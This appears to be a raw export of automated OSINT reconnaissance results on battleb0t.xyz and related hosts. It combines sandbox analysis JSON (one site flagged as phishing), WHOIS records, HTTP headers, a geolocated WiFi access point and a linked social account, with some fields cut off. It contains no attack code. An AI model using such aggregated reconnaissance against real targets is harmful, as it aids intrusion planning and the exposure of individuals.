<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 02:49:09 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [github.com]
https://www.virustotal.com/en/domain/github.com/information/ | github.com |
| 2023-05-12 02:53:35 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.110.153 |
| 2023-05-12 02:48:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 22, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.opentext.com/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4204:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4204:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6036:120:WilError_01"\n "Local\\SM0:6036:304:WilStaging_02"\n "SM0:6036:120:WilError_01"\n "Local\\SM0:4204:304:WilStaging_02"\n "SM0:4204:304:WilStaging_02"\n "Local\\SM0:4204:120:WilError_01"\n "SM0:4204:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4204:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4204:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.40.92:443"\n "35.84.103.227:443"\n "104.19.187.97:443"\n "104.18.43.158:443"\n "104.26.6.30:443"\n "104.16.126.175:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.ot.digital"\n "cdn.cookielaw.org"\n "central.opentext.com"\n "d3js.org"\n "geolocation.onetrust.com"\n "origin.marketinghub.opentext.com"\n "rsms.me"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""sameAs": ["https://twitter.com/OpenText","https://www.youtube.com/user/opentextcorp","https://www.linkedin.com/company/opentext"]" (Indicator: "linkedin.com")\n "ls:begin[meta-twitter]-->" (Indicator: "twitter")\n "<meta name="twitter:url" content="https://www.opentext.com/homepage">" (Indicator: "twitter")\n "<meta name="twitter:title" content="OpenText | Information Management Solutions">" (Indicator: "twitter")\n "ls:end[meta-twitter]-->" (Indicator: "twitter")\n "<meta property="twitter:image" content="/assets/images/OT_ShareImage_twitter.png">" (Indicator: "twitter")\n "<li class="list-inline-item"><a class="social-icon social-icon-linkedin" href="https://www.linkedin.com/company/opentext"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "linkedin.com")\n "<li class="list-inline-item"><a class="social-icon social-icon-twitter" href="https://twitter.com/OpenText"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "twitter")\n "<li class="list-inline-item"><a class="social-icon social-icon-youtube" href="https://www.youtube.com/user/opentextcorp"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "youtube")\n "<path fill="currentColor" fill-rule="evenodd" clip-rule="evenodd" d="M27.8 14.1C27.8 14.1 27.604 12.692 27.005 12.072C26.319 11.339 25.559 11.263 25.13 11.221L25 11.207C22.203 11 18.005 11 18.005 11H17.995C17.995 11 13.797 11 10.999 11.207L10.872 11.22C10.442 11.263 9.682 11.338 8.995 12.072C8.395 12.692 8.2 14.101 8.2 14.101C8.2 14.101 8 15.755 8 17.409V18.959C8 20.613 8.2 22.267 8.2 22.267C8.2 22.267 8.395 23.675 8.995 24.295C9.627 24.971 10.421 25.069 10.929 25.131H10.93C11.034 25.144 11.124 25.155 11.2 25.169C12.8 25.326 18 25.375 18 25.375C18 25.375 22.203 25.369 25.001 25.162L25.131 25.148C25.56 25.105 26.32 25.029 27.005 24.295C27.605 23.675 27.8 22.267 27.8 22.267C27.8 22.267 28 20.613 28 18.959V17.409C28 15.755 27.8 14.101 27.8 14.101V14.1ZM15.934 15.096L15.935 20.838L21.338 17.978L15.934 15.096V15.096Z"></path></svg><span class="sr-only">OpenText on Youtube</span></a></li>" (Indicator: "youtube")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpswww.opentext.com" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_2]- [targetUID: 00000000-00004204]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45\\Ruleset Data]- [targetUID: 00000000-00004204]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4204_1570983389\\edge_driver.js]- [targetUID: 00000000-00004204]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4204_136538697\\Filtering Rules]- [targetUID: 00000000-00004204]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00004204]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004204]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004204]\n "8e9b2f83-d856-4edd-b2fc-76a0ecffee8d.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 559302"- Location: [%TEMP%\\8e9b2f83-d856-4edd-b2fc-76a0ecffee8d.tmp]- [targetUID: 00000000-00004204]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00004204]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4204_136538697\\Filtering Rules-AA]- [targetUID: 00000000-00004204]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "f_0004d6" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d6]- [targetUID: 00000000-00005988]\n "f_0004cb" has type "Web Open Font Format (Version 2) TrueType length 245036 version 1.0"- [targetUID: N/A]\n "f_0004c8" has type "Web Open Font Format (Version 2) TrueType length 227180 version 1.0"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c8]- [targetUID: 00000000-00005988]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-50', u'name': u'Creates a license file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"edge_driver.js.LICENSE.txt" has type "Unknown"- Location: [%TEMP%\\4204_1570983389\\edge_driver.js.LICENSE.txt]- [targetUID: 00000000-00004204]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.opentext.com/"\n Pattern match: "https://www.opentext.com"\n Heuristic match: "cdn.cookielaw.org"\n Heuristic match: "central.opentext.com"\n Heuristic match: "d3js.org"\n Heuristic match: "geolocation.onetrust.com"\n Heuristic match: "origin.marketinghub.opentext.com"\n Heuristic ma | 185.199.110.153 |
| 2023-05-12 03:41:55 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | inflany.com | mail.inflany.com |
| 2023-05-12 02:50:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://drivertheorytest.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f0c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_f0c_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3852"\n "IsoScope_f0c_IE_EarlyTabStart_0xee4_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f0c_IESQMMUTEX_0_303"\n "IsoScope_f0c_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f0c_ConnHashTable<3852>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ayt-wgt.hostingsiteforfree.com"\n "drivertheorytest.com"\n "www.gannett-cdn.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "loader-blue_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarA0C7.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA0D9.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"drivertheorytest.com"\n "ayt-wgt.hostingsiteforfree.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"198.144.188.52:80"\n "142.251.46.202:443"\n "185.199.110.153:443"\n "151.101.2.62:443"\n "142.250.188.10:443"\n "142.251.214.131:443"\n "162.159.134.233:443"\n "199.59.243.222:80"\n "104.27.195.88:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /css?family=Lato:300,400,700|Raleway:300,400,500|Open+Sans:300,400,600,700,800 HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css?family=Lato:300,400,700|Raleway:300,400,500|Open+Sans:300,400,600,700,800 HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery.backstretch.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery.backstretch.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery.cycle.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery.cycle.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery.parallax.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery.parallax.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery-1.11.1.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery-1.11.1.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /experiments/usatoday/2015/10/poll-tracker-2016/img/loader-blue.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.gannett-cdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /experiments/usatoday/2015/10/poll-tracker-2016/img/loader-blue.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.gannett-cdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /ajax/libs/jquery/2.2.4/jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ajax.googleapis.com\nIf-Modified-Since: Tue, 20 Dec 2016 18:17:03 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /ajax/libs/jquery/2.2.4/jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: aja | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:36:94:66) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project management software | cdn-185-199-111-153.github.com |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | likeevideo (Category: social)
https://likee.video/@ayshoo | ayshoo |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:09:48 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 76.170.74.34.bc.googleusercontent.com | 34.74.170.76 |
